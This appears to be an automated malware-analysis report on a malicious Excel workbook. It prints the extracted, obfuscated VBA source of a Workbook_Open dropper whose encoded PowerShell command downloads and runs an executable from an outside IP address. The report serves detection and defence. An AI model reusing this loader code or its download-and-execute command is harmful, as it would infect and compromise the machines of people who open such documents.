MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains an obfuscated VBA loader within a Workbook_Open macro, a common technique for executing malicious code upon opening an Office document. The script attempts to download and execute a second-stage payload from the URL 'http://198.12.66.104/WJQq4ad0DYUqPhl.exe' using PowerShell. This behavior is consistent with a macro-based dropper.
Heuristics 6
-
ClamAV: Xls.Dropper.EPPlus-9802867-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.EPPlus-9802867-2
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5560 bytes |
SHA-256: 6da82e7ef4fd0873a68e37bf19a5eca2192f88bda2e72e55c4dbacd94d1be683 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Loader"aHR0cDovLzE5OC4xMi42Ni4xMDQvV0pRazRhZDBEWVVRcEhsLmV4ZQ=="
End Sub
Function hjwsuadem94(str As String) As Variant: Dim bytes() As Byte: bytes = str: hjwsuadem94 = bytes: End Function
Function uzuocz31ggbsm8d4l(bytes() As Byte) As String: Dim str As String: str = bytes: uzuocz31ggbsm8d4l = str: End Function
Function ryauetf29zc5lx6uh(str As String) As String
Const BCvo09gf89_BVC As String = "omob31yqjybxcbdwj"
Dim ZdaVCfdpVCP_KaKal() As Byte, SokNAH_() As Byte
ZdaVCfdpVCP_KaKal = hjwsuadem94(str)
SOtAN_ = hjwsuadem94(BCvo09gf89_BVC)
Dim Sola67BChdPo_NcBBn As Long
Sola67BChdPo_NcBBn = UBound(ZdaVCfdpVCP_KaKal)
ReDim BCVPlokIgdh67BCGF_BQAZ(0 To Sola67BChdPo_NcBBn) As Byte
Dim idx As Long
For idx = LBound(ZdaVCfdpVCP_KaKal) To Sola67BChdPo_NcBBn:
If Not ZdaVCfdpVCP_KaKal(idx) = 0 Then
c = ZdaVCfdpVCP_KaKal(idx)
For i = 0 To UBound(SOtAN_):
c = c Xor SOtAN_(i)
Next i
BCVPlokIgdh67BCGF_BQAZ(idx) = c
End If
Next idx
ryauetf29zc5lx6uh = uzuocz31ggbsm8d4l(BCVPlokIgdh67BCGF_BQAZ)
End Function
Public Sub Loader(Link As String)
CreateObject(AWqQ32PO095TRDFvcBBnMZAqQP87BXCVrwe_QARWE("57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run (Base64Decode("cG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVcgSGlkZGVuIC1jb21tYW5kIChuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJw==" & Link & "JywkZW52OlRlbXArJ1xwdXR0eS5leGUnKTsoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4ZWN1dGUoJGVudjpUZW1wKydccHV0dHkuZXhlJyk="))
End Sub
Public Function AWqQ32PO095TRDFvcBBnMZAqQP87BXCVrwe_QARWE(ByVal QErwPLo98VCb65ADFs12CZXMpLAUYSTRSf878VXBWER_PLANBC67P As String) As String
Dim pujdydwiy5b9szuiw As String
Dim v2y2x3t16zenjz0oz As String
Dim kla2y5cg1sf8h8n64 As Long
For SKOp9LMRSTR987BCVqrw455209oiGDFCVXFsmnjhu_GuL = 1 To Len(QErwPLo98VCb65ADFs12CZXMpLAUYSTRSf878VXBWER_PLANBC67P) Step 3
PLAKj095GDFQWAZXCvMLOPBCGFdyuTTAIUpo96543DFS_VCB98RTA = Chr$(Val(ryauetf29zc5lx6uh("R" & "" & "<") & Mid$(QErwPLo98VCb65ADFs12CZXMpLAUYSTRSf878VXBWER_PLANBC67P, SKOp9LMRSTR987BCVqrw455209oiGDFCVXFsmnjhu_GuL, 2)))
v2y2x3t16zenjz0oz = v2y2x3t16zenjz0oz & PLAKj095GDFQWAZXCvMLOPBCGFdyuTTAIUpo96543DFS_VCB98RTA
Next SKOp9LMRSTR987BCVqrw455209oiGDFCVXFsmnjhu_GuL
AWqQ32PO095TRDFvcBBnMZAqQP87BXCVrwe_QARWE = v2y2x3t16zenjz0oz
End Function
Function Base64Decode(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, ryauetf29zc5lx6uh("T"), "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, ryauetf29zc5lx6uh(Chr(54) & "" & " " & "" & " " & "" & " " & "" & Chr(66) & "" & Chr(64) & ryauetf29zc5lx6uh(Chr(68)) & "" & Chr(17) & "" & " " & "" & " " & "" & " " & " " & ""), ryauetf29zc5lx6uh("6" & "" & Chr(21) & "" & " " & "" & "T" & "" & "6" & Chr(21) & Chr(7) & "" & Chr(17) & "" & "B" & "@" & "T" & Chr(7) & "" & Chr(0) & "" & " " & "" & " " & " " & " " & "" & "Z" & "")
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = ryauetf29zc5lx6uh("I" & "") Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 7168 bytes |
SHA-256: 4af2c47d19085d99f0161881ab6bfccccd559efea266a8b29202c3a3ecab4bbe |
|||
|
Detection
ClamAV:
Xls.Dropper.EPPlus-9802867-2
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.